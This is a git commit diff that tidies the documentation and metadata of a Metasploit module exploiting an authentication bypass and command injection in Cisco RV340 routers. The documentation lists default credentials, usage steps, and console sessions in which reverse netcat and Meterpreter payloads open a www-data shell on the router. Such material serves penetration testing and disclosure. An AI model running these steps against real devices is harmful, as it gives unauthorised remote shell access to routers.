Minor fixes from review
parent
4b05ba6189
commit
f2a86327d0
|
@ -9,14 +9,19 @@ Vulnerable up to, and tested against, firmware version 1.0.03.24. Version 1.0.03
|
||||||
|
|
||||||
### Installation
|
### Installation
|
||||||
|
|
||||||
Vulnerable software: https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03.24
|
Firmware version 1.0.03.24, which is vulnerable to CVE-2022-20705 and CVE-2022-20707, can be downloaded from
|
||||||
|
https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03.24
|
||||||
|
|
||||||
Log into the modem. Default IP address is 192.168.1.1 and default credentials
|
To install this firmware, follow the following directions:
|
||||||
are cisco for username and password. The `administration` option on the left
|
1. Log into the modem. The default IP address is 192.168.1.1 and the default credentials
|
||||||
side of the web page will take you to a form with a `Manual Upgrade` section.
|
are `cisco` for the username and password.
|
||||||
Leave `File Type: ` on default `Firmware Image` option. Change `Upgrade From:` option to `PC`. Press the `Upgrade` button.
|
2. The `administration` option on the left side of the web page will take you to a form
|
||||||
Press `Yes` on the message box asking `Are you sure you want to upgrade the firmware right now?`. Wait for router
|
with a `Manual Upgrade` section.
|
||||||
reboot to complete.
|
3. Leave `File Type: ` on the default `Firmware Image` option.
|
||||||
|
4. Change `Upgrade From:` option to `PC`.
|
||||||
|
5. Press the `Upgrade` button.
|
||||||
|
6. Press `Yes` on the message box asking `Are you sure you want to upgrade the firmware right now?`.
|
||||||
|
7. Wait for router reboot to complete.
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
|
@ -26,16 +31,14 @@ reboot to complete.
|
||||||
4. Do: `set lhost <listening ip>`
|
4. Do: `set lhost <listening ip>`
|
||||||
5. Do: `set rhost <target ip>`
|
5. Do: `set rhost <target ip>`
|
||||||
6. Do: `exploit`
|
6. Do: `exploit`
|
||||||
7. Verify: You see the message "Exploit successfully executed" confirming the exploit completed
|
7. Verify: You see the message `Exploit successfully executed` confirming the exploit completed
|
||||||
8. Verify: You are the "www-data" user using the `id` command
|
8. Verify: You are the `www-data` user using the `id` command
|
||||||
|
|
||||||
## Options
|
## Options
|
||||||
|
|
||||||
## Scenarios
|
## Scenarios
|
||||||
|
|
||||||
### Reverse Netcat Output
|
### Cisco RV340 Router 1.0.03.24 on ARM architecture - reverse_netcat payload
|
||||||
|
|
||||||
Cisco RV340 Router running 1.0.03.24 on ARM architecture
|
|
||||||
|
|
||||||
```
|
```
|
||||||
msf6 > use modules/exploits/linux/http/cisco_rv340_lan
|
msf6 > use modules/exploits/linux/http/cisco_rv340_lan
|
||||||
|
@ -55,11 +58,9 @@ msf6 exploit(linux/http/cisco_rv340_lan) > exploit
|
||||||
|
|
||||||
id
|
id
|
||||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||||
|
|
||||||
```
|
```
|
||||||
### Meterpreter Linux Dropper
|
|
||||||
|
|
||||||
Cisco RV340 Router running 1.0.03.24 on ARM architecture
|
### Cisco RV340 Router 1.0.03.24 on ARM architecture - reverse_tcp ARMLE Meterpreter payload
|
||||||
|
|
||||||
```
|
```
|
||||||
msf6 > use modules/exploits/linux/http/cisco_rv340_lan
|
msf6 > use modules/exploits/linux/http/cisco_rv340_lan
|
||||||
|
@ -90,5 +91,4 @@ Process 11012 created.
|
||||||
Channel 1 created.
|
Channel 1 created.
|
||||||
id
|
id
|
||||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
|
@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
versions 1.0.03.24 and below.
|
versions 1.0.03.24 and below.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Platform' => ['Linux', 'Unix'],
|
'Platform' => ['linux', 'unix'],
|
||||||
'Author' => [
|
'Author' => [
|
||||||
'Biem Pham', # Vulnerability Discoveries
|
'Biem Pham', # Vulnerability Discoveries
|
||||||
'Neterum', # Metasploit Module
|
'Neterum', # Metasploit Module
|
||||||
|
@ -33,10 +33,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'DisclosureDate' => '2021-11-02',
|
'DisclosureDate' => '2021-11-02',
|
||||||
'Arch' => [ARCH_CMD, ARCH_ARMLE],
|
'Arch' => [ARCH_CMD, ARCH_ARMLE],
|
||||||
'References' => [
|
'References' => [
|
||||||
[ 'CVE', '2022-20705'], # Authentication Bypass
|
['CVE', '2022-20705'], # Authentication Bypass
|
||||||
[ 'CVE', '2022-20707'], # Command Injection
|
['CVE', '2022-20707'], # Command Injection
|
||||||
[ 'ZDI', '22-410'], # Authentication Bypass
|
['ZDI', '22-410'], # Authentication Bypass
|
||||||
[ 'ZDI', '22-411'] # Command Injection
|
['ZDI', '22-411'] # Command Injection
|
||||||
],
|
],
|
||||||
'Targets' => [
|
'Targets' => [
|
||||||
[
|
[
|
||||||
|
|